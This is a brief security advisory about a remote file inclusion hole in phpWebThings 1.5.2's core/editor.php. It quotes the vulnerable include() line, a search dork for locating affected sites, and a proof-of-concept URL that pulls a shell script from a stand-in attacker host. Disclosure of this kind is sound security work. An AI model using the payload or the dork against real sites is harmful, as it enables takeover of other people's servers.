phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability

±------------------------------------------------------------------------------------------

• phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability
  ±------------------------------------------------------------------------------------------
• Affected Software .: phpWebThings 1.5.2
• Vendor …: http://www.phpwebthings.nl/
• Download …: http://prdownloads.sourceforge.net/phpwebthings/phpwebthings_1_5_2.zip?download
• Description …: "phpWebThings is a Powerful, professional application framework"
• Dork …: "This website was created with phpWebThings"
• Class …: Remote File Inclusion
• Risk …: High (Remote File Execution)
• Found By …: nuffsaid <nuffsaid[at]newbslove.us>
  ±------------------------------------------------------------------------------------------
• Details:
• phpWebThings 1.5.2 core/editor.php does not initialize the $editor_insert_bottom variable
• before using it to include files, assuming register_globals = on, we can initialize the
• variable in a query string and include a remote file of our choice.
• Vulnerable Code:
• core/editor.php, line(s) 289:
• -> 289: if ($editor_insert_bottom<>"") include($editor_insert_bottom);
• Proof Of Concept:
• http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php
  ±------------------------------------------------------------------------------------------